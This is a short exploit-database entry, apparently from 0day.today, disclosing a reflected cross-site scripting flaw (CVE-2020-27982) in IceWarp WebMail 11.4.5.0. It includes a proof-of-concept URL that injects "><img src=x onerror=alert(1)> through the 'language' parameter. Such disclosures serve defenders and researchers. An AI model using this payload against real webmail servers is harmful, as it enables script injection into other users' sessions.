[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Icewarp WebMail 11.4.5.0 Cross Site Scripting Vulnerability

Author
Harun Karakis
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35150
Category
web applications
Date add
31-10-2020
CVE
CVE-2020-27982
Platform
php
[+] Title: IceWarp WebMail Cross-Site Scripting Vulnerability
[+] Author: Harun Karakış
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 10
[+] Versions: 11.4.5.0
[+] Vulnerable Parameter: "language" (Get Method)
[+] Vulnerable File: /webmail/
[+] Cve:CVE-2020-27982

# PoC:

[+] Go to : http://localhost/webmail/
or

[+] Add the "language" parameter to the URL and write malicious code, Example: http://localhost/webmail/?language="><img src=x onerror=alert(1)>

[+] When the user goes to the URL, the malicious code is executed

Example Vulnerable URL: http://localhost/webmail/?language="><img src=x onerror=alert(1)> (Payload: "><img src=x onerror=alert(1)>)

example picture
https://i.hizliresim.com/FBcSbW.png

#  0day.today [2024-11-16]  #